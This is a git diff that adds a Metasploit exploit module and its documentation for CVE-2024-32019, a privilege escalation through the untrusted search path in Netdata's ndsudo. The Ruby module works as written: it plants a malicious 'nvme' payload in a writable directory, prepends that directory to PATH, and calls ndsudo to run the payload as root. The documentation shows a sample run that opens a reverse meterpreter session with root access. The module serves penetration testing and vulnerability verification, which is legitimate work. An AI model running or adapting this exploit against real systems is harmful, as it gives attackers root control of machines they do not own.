diff --git a/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md b/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md new file mode 100644 index 0000000000000..cde4c03306a94 --- /dev/null +++ b/documentation/modules/exploit/linux/local/ndsudo_cve_2024_32019.md @@ -0,0 +1,60 @@ +## Vulnerable Application + +The `ndsudo` is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the `ndsudo` binary. The vulnerability is an untrusted search path. When searching for additional binary files, such as `nvme`, an attacker can create a malicious binary with same name and add the directory of this binary into the `$PATH` variable. The `ndsudo` will trust the first occurrence of this binary and execute it. + +Installation steps: + +1. `sudo apt install cmake libelf-dev git bison flex build-essential libssl-dev pkg-config liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev` +1. `wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz` +1. `gunzip netdata-latest.tar.gz` +1. `tar -xf netdata-latest.tar` +1. `cd netdata-v1.45.0-8-g5803c7766/` +1. `sudo ./netdata-installer.sh` + +## Verification Steps + +1. Install the application +1. Start msfconsole +1. Receive a session +1. Do: `use exploit/linux/local/ndsudo_cve_2024_32019` +1. Do: `set session [session number]` +1. Do: `run` +1. Get root shell/meterpreter session + +## Options + + +### WritableDir + +A path where malicious `nvme` binary will be stored. This path will be later prepended to `$PATH` variable to achieve privilege escalation. + +### NdsudoPath + +The path to the `ndsudo` binary. + + +## Scenarios + +``` +msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true +[*] Started reverse TCP handler on 192.168.3.7:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Vulnerable binary detected +[*] Creating malicious file at /tmp/nvme +[*] Writing '/tmp/nvme' (250 bytes) ... +[*] Executing.. +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3090404 bytes) to 10.5.134.200 +[+] Deleted /tmp/nvme +[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 10.5.134.200 +OS : Ubuntu 20.04 (Linux 5.13.0-1021-oem) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` diff --git a/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb b/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb new file mode 100644 index 0000000000000..e84c3847e2fb7 --- /dev/null +++ b/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb @@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Netdata ndsudo privilege escalation', + 'Description' => %q{ + The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'msutovsky-r7', # msf module + 'mia-0' # security researcher + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93'], + [ 'CVE', '2024-32019'] + ], + 'DisclosureDate' => '2024-04-12', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS] + } + ) + ) + + register_advanced_options [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptString.new('NdsudoPath', [ true, 'A path to ndsudo binary on the target system', '/usr/libexec/netdata/plugins.d/ndsudo']) + ] + end + + def check + # could not find reasonable way to get version + return CheckCode::Safe('Vulnerable binary not detected, check NdsudoPath option') unless file?(datastore['NdsudoPath']) && executable?(datastore['NdsudoPath']) + return CheckCode::Unknown('Failed to run vulnerable binary, either binary is not ndsudo or user does not have right to execute ndsudo') unless cmd_exec(datastore['NdsudoPath']) == 'at least 2 parameters are needed, but 1 were given.' + + CheckCode::Appears('Vulnerable binary detected') + end + + def exploit + base_dir = datastore['WritableDir'] + if !datastore['ForceExploit'] && is_root? + fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override') + end + + unless writable? base_dir + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + + executable_path = "#{base_dir}/nvme" + vprint_status("Creating malicious file at #{executable_path}") + + fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless upload_and_chmodx(executable_path, generate_payload_exe) + + register_files_for_cleanup(executable_path) + + vprint_status('Executing..') + + cmd_exec("PATH=#{base_dir}:$PATH '#{datastore['NdsudoPath']}' nvme-list") + end +end